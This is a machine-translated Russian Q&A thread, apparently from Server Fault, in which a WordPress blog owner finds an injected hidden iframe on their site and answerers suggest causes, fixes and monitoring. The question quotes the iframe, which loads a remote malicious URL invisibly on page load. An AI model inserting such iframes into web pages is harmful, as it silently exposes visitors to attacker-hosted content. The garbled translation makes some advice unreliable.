Вопросы Теги

Мой сервер взламывают? [дубликат]

Возможный дубликат:
Мой сервер был взломан АВАРИЙНАЯ СИТУАЦИЯ

Я получил эту странную страницу, которая, я уверен, была создана не мной: 

<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>

Где черт возьми, это откуда? Это вирус ??

Мой блог-сайт blog.domain.com был в порядке несколько недель назад. Но теперь, внезапно, когда я захожу в свой блог, он становится пустой страницей и отображается: 

This is index.html

Кто-нибудь знает, как удалить его навсегда и предотвратить повторение этого на моем сайте?

1
задан 13 April 2017 в 15:13
5 ответов

Я видел такой iframe, встроенный прежде. Кто-то определенно угнал Вашу страницу и встроил ссылку. Удалите все ссылки на него, что можно найти, и изменять ВСЕ пароли.

Хостам дешевки никогда не нравится признавать, что они были взломаны, таким образом, я не буду ожидать много справки от них

3
ответ дан 3 December 2019 в 16:59

Это - перекрестный сайт, Пишущий сценарий (XSS) нападение. Запустите чтение на них. Существуют некоторые большие скринкасты/видео вокруг об этом виде вещи также.

Основной момент не должен быть небрежным теперь. Ваш сайт имеет слабость, которая должна быть найдена и зафиксирована. Не возлагайте ответственность за него на свою хостинговую компанию также; скорее всего, это - Ваше собственное, принимают за выбор плохого механизма блога или не совершенствование хорошего механизма блога с последними патчами безопасности или выпусками.

Также: Вы, кажется, только знаете о "вирусах". Взламывание сервера не имеет отношения к вирусам. Проблемой является уязвимость. Старые версии Wordpress действительно имеют их---недавно очень плохой, который необходимо определенно обновить до патча. Вы могли бы хотеть изучить автоматические обновления системы защиты для своей ОС, программы, которые пошлют Вам по электронной почте список текущих уязвимостей в Ваших серверах и/или подпишутся на сайты CVE, которые предупреждают Вас обо всех последних программных проблемах.

По крайней мере, если Вы - admining сервер/сайт Linux, подписываетесь на некоторые администраторские сайты Linux, которые отправляют достойные статьи, которые преподают Вам новые навыки и предупреждают о новых проблемах. XSS был около долгого времени теперь.

2
ответ дан 3 December 2019 в 16:59
  • 1
    Я не знаю об этом исключительно быть XSS. У меня был веб-сайт, который был просто единственным статическим файлом HTML и изображением заполнителя, и это получило один из них. И это был отказ хостов, потому что каждый сайт, который я мог найти на их сервисах, имел тот. –  Mark Henderson♦ 8 October 2009 в 23:19
  • 2
    Farseeker: Мог иметь место на некотором очень небезопасном общем хостинге, но любом хорошем (виртуальном) специализированном хостинге shouldn' t страдают от такой ненадежности - только admin' s (т.е. Ваш) владеют надзором. Я услышал о некоторых дешевых компаниях по веб-хостингу, сознательно поместив рекламу в их clients' сайты как метод создания сервисной платы все же. Я думал компании, делающие, которого давно избежали все, хотя, и умер в результате. –  Lee B 14 October 2009 в 00:36

В дополнение к предложениям Farseeker следуйте всем инструкциям в этом:

Объявление сервиса сообщества Предупреждения о вирусе


Для аудио, которому повреждают, вот текстовая версия сообщения.

1
ответ дан 3 December 2019 в 16:59

Удалите файл "index.html" из своего индекса каталога. Может случиться так, что Ваш хост переключил индексный приоритет... с index.php (например), сначала к index.html.

0
ответ дан 3 December 2019 в 16:59
  • 1
    Хорошо. Я удалил index.html. Это кажется прекрасным теперь. Но, где тот странный файл прибывает из? Это похоже на вирус. Я назвал свою хостинговую компанию, они сказали, что не изменили приоритет. Странный!! Я не хочу это к happern снова!! Но КАК?? –   8 October 2009 в 11:01
  • 2
    Измените свои пароли на что-то безопасное. Если you' ре, все еще получая проблемы, затем Ваш хост должно зафиксировать его. Наблюдение редактирования выше, определенно не дружественный файл. Я также удостоверился бы, что Ваше программное обеспечение блога обновляется к новейшему выпуску безопасности. –  Xorlev 8 October 2009 в 11:05
  • 3
    Я использую wordpress 2.7, последнее должно быть 2.8 или что-то. Так срыв.. Я просканировал свой компьютер, никакие обнаруженные вирусы. –   8 October 2009 в 11:11
  • 4
    Не Ваш компьютер обязательно, но использование в ведущем блог программном обеспечении или чем-то еще. –  Xorlev 8 October 2009 в 11:32
  • 5
    Существует большое использование во всех версиях Wordpress ниже 2.8.4 (я думаю), который очень легко использовать. Необходимо обновить до 2.8.4 как можно скорее. –  mrdenny 8 October 2009 в 21:44

Поскольку другие уже достаточно покрыли, что сделать о Вашей небольшой проблеме, наиболее важный момент, конечно, являющийся, чтобы сделать некоторое изучение, я не копирую их усилия. Я однако добавлю, что необходимо контролировать сайт. Очевидно взлом, возможно, произошел любое время за многие недели, все же Вы не знали о нем.

Существует много способов автоматически контролировать сайт для изменений, и необходимо будет выбрать метод, который будет работать с системой хоста. В случае, если Вы застреваете для идей, метод, который я использую, является сценарием оболочки, работающим на локальной машине, чтобы сделать следующий каждая ночь:

  • Зеркально отразите весь сайт с помощью wget (rsync, не доступно мне),
  • Назовите сценарий Perl, который анализирует журнал, игнорируя выбранные пункты, такие как каталоги кэша и файлы, создавая список любых изменений. Если какие-либо изменения обнаруживаются, что список посылается по электронной почте мне.
  • Назовите другой сценарий, который рекурсивно анализирует .listing файлы и удаляет любые локальные файлы и каталоги, которые больше не существуют на сервере.
  • Переименуйте более старые архивы сайта, таким образом, что предыдущие 9 сохранены и архивируют текущую версию.
0
ответ дан 3 December 2019 в 16:59

Теги

Похожие вопросы